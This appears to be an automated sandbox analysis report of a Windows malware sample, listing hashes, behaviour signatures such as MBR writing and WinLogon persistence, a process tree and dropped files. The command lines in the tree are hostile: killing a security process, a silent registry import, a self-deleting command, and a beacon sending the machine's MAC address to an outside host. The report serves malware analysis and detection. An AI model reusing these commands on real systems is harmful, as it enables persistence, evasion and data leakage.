Analysis

  • max time kernel
    42s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    19/09/2022, 11:21

General

  • Target

    d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe

  • Size

    208KB

  • MD5

    1690e0408b941cfe9f8d8ffe46bb9481

  • SHA1

    03d3a9c8e5bff263caa06c4795bd4dca2d1561c7

  • SHA256

    d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190

  • SHA512

    02a272ca995f123df7becf79b4b3a17b11f5fbcfbcac070c001d20b79a07035cdc99b10a72554728591b6370e3eedb58649dc4fff102322fc2fa06ecb67d6bc6

  • SSDEEP

    6144:jZA/L880NEJji+5rqqULirD2Ei/NjO50p8I4cC:je/L880NEJjBdrm/fGI4D

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 16 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 23 IoCs
  • Modifies registry class 10 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe
    "C:\Users\Admin\AppData\Local\Temp\d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe"
    1⤵
    • Loads dropped DLL
    • Writes to the Master Boot Record (MBR)
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1852
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im ZhuDongFangyu.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:884
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.baigezi.com/shenjingyuan/get.asp?mac=EA25B6F29539&makedate=QM00013&comput=Home&ver=28&userid=0001
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1376
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1376 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1624
    • C:\Windows\SysWOW64\4875\takesoft.exe
      C:\Windows\system32\4875\takesoft.exe C:\Users\Admin\AppData\Local\Temp\d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe===
      2⤵
      • Executes dropped EXE
      • Deletes itself
      • Loads dropped DLL
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1032
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c regedit /s "C:\Windows\SysWOW64\4875\test.reg"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:568
        • C:\Windows\SysWOW64\regedit.exe
          regedit /s "C:\Windows\SysWOW64\4875\test.reg"
          4⤵
          • Modifies WinLogon for persistence
          • Runs .reg file with regedit
          PID:2000
      • C:\Windows\SysWOW64\4875\y5dbadrm.exe
        C:\Windows\SysWOW64\4875\y5dbadrm.exe
        3⤵
        • Modifies visibility of file extensions in Explorer
        • Executes dropped EXE
        • Drops file in System32 directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1036
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im ZhuDongFangyu.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:960
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ping 127.0.0.1 -n 1 && del "C:\Windows\SysWOW64\4875\y5dbadrm.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1608
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 1
            5⤵
            • Runs ping.exe
            PID:1224

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Windows\SysWOW64\4875\dasoft.encode

    Filesize

    21KB

    MD5

    927a2d7ff0b6bd652ac90f728b629df9

    SHA1

    6f884a65fb289ebd0b254feb252c2975db4b5653

    SHA256

    d5bfb5ac7bde7a330c29af498d7d20671fabd89df0ec45a412c0387a7cbb0b58

    SHA512

    0990da10058167907f93204188ed0c9b48e4a6de72dc80f6589063ca6f7c74b10dcc8124e3b385c3b8c8eb9e1c0accf39df640037b2244ae4c8d7ca955345422

  • C:\Windows\SysWOW64\4875\takesoft.exe

    Filesize

    12KB

    MD5

    c8bfba56ddee001619ec54b4295ed327

    SHA1

    c9f811a28521725616069e087e85347356a8af53

    SHA256

    9af534965d92113928ebb06b749e958caa1fb5491790df0144b1e1b442e66904

    SHA512

    04a9b3dd8ff18d4d18d17e701381109e774bd21fb25688d5cea0933417d4d1a677ce89f980582456793e319e03c1cedc8da8b9d32dbb158e1a37e076f14b72e6

  • C:\Windows\SysWOW64\4875\takesoft.exe

    Filesize

    12KB

    MD5

    c8bfba56ddee001619ec54b4295ed327

    SHA1

    c9f811a28521725616069e087e85347356a8af53

    SHA256

    9af534965d92113928ebb06b749e958caa1fb5491790df0144b1e1b442e66904

    SHA512

    04a9b3dd8ff18d4d18d17e701381109e774bd21fb25688d5cea0933417d4d1a677ce89f980582456793e319e03c1cedc8da8b9d32dbb158e1a37e076f14b72e6

  • C:\Windows\SysWOW64\4875\test.reg

    Filesize

    206B

    MD5

    14e0a5d62a1f101d3ee4214a02879a66

    SHA1

    8115fa6b7cae60397447d6a114e3005b00cda6d2

    SHA256

    998d6224662826d510768455fac989f116ef0ee6f05b4a32cde12705bae75a82

    SHA512

    66a63bd71a842ae1b0cfee829d9dcf5477d07378c334e6a9fcc8010d5154713ed52beffbd66e408893de40b708bae73f50e378bb3ad385924286ca57c178d8fc

  • C:\Windows\SysWOW64\4875\y5dbadrm.exe

    Filesize

    21KB

    MD5

    0c91131774261d721eb9827939bb803f

    SHA1

    516f6b6ef440fdbb1435ee3b70f110d71957be15

    SHA256

    ad4f6988c3b0d7dcd8cb4f0314edab495d418055900c5a36ff93fcac7e3da974

    SHA512

    dde5c7fc27fa022c988cb306c4d8c67748de81b559c7f613263fa81d8b569746a02167c05b84568dd21766e27693a0e6245f09726c056aa0c4cb597a46a22a96

  • C:\Windows\SysWOW64\4875\y5dbadrm.exe

    Filesize

    21KB

    MD5

    0c91131774261d721eb9827939bb803f

    SHA1

    516f6b6ef440fdbb1435ee3b70f110d71957be15

    SHA256

    ad4f6988c3b0d7dcd8cb4f0314edab495d418055900c5a36ff93fcac7e3da974

    SHA512

    dde5c7fc27fa022c988cb306c4d8c67748de81b559c7f613263fa81d8b569746a02167c05b84568dd21766e27693a0e6245f09726c056aa0c4cb597a46a22a96

  • \Windows\SysWOW64\4875\takesoft.exe

    Filesize

    12KB

    MD5

    c8bfba56ddee001619ec54b4295ed327

    SHA1

    c9f811a28521725616069e087e85347356a8af53

    SHA256

    9af534965d92113928ebb06b749e958caa1fb5491790df0144b1e1b442e66904

    SHA512

    04a9b3dd8ff18d4d18d17e701381109e774bd21fb25688d5cea0933417d4d1a677ce89f980582456793e319e03c1cedc8da8b9d32dbb158e1a37e076f14b72e6

  • \Windows\SysWOW64\4875\takesoft.exe

    Filesize

    12KB

    MD5

    c8bfba56ddee001619ec54b4295ed327

    SHA1

    c9f811a28521725616069e087e85347356a8af53

    SHA256

    9af534965d92113928ebb06b749e958caa1fb5491790df0144b1e1b442e66904

    SHA512

    04a9b3dd8ff18d4d18d17e701381109e774bd21fb25688d5cea0933417d4d1a677ce89f980582456793e319e03c1cedc8da8b9d32dbb158e1a37e076f14b72e6

  • \Windows\SysWOW64\4875\y5dbadrm.exe

    Filesize

    21KB

    MD5

    0c91131774261d721eb9827939bb803f

    SHA1

    516f6b6ef440fdbb1435ee3b70f110d71957be15

    SHA256

    ad4f6988c3b0d7dcd8cb4f0314edab495d418055900c5a36ff93fcac7e3da974

    SHA512

    dde5c7fc27fa022c988cb306c4d8c67748de81b559c7f613263fa81d8b569746a02167c05b84568dd21766e27693a0e6245f09726c056aa0c4cb597a46a22a96

  • \Windows\SysWOW64\4875\y5dbadrm.exe

    Filesize

    21KB

    MD5

    0c91131774261d721eb9827939bb803f

    SHA1

    516f6b6ef440fdbb1435ee3b70f110d71957be15

    SHA256

    ad4f6988c3b0d7dcd8cb4f0314edab495d418055900c5a36ff93fcac7e3da974

    SHA512

    dde5c7fc27fa022c988cb306c4d8c67748de81b559c7f613263fa81d8b569746a02167c05b84568dd21766e27693a0e6245f09726c056aa0c4cb597a46a22a96

  • memory/1032-64-0x0000000000400000-0x000000000040A000-memory.dmp

    Filesize

    40KB

  • memory/1032-86-0x0000000000240000-0x0000000000254000-memory.dmp

    Filesize

    80KB

  • memory/1032-87-0x0000000000240000-0x0000000000254000-memory.dmp

    Filesize

    80KB

  • memory/1032-88-0x0000000000400000-0x000000000040A000-memory.dmp

    Filesize

    40KB

  • memory/1036-84-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/1852-67-0x0000000000400000-0x0000000000434000-memory.dmp

    Filesize

    208KB

  • memory/1852-63-0x0000000000230000-0x000000000023A000-memory.dmp

    Filesize

    40KB

  • memory/1852-62-0x0000000000230000-0x000000000023A000-memory.dmp

    Filesize

    40KB

  • memory/1852-57-0x0000000000400000-0x0000000000434000-memory.dmp

    Filesize

    208KB

  • memory/2000-80-0x0000000075521000-0x0000000075523000-memory.dmp

    Filesize

    8KB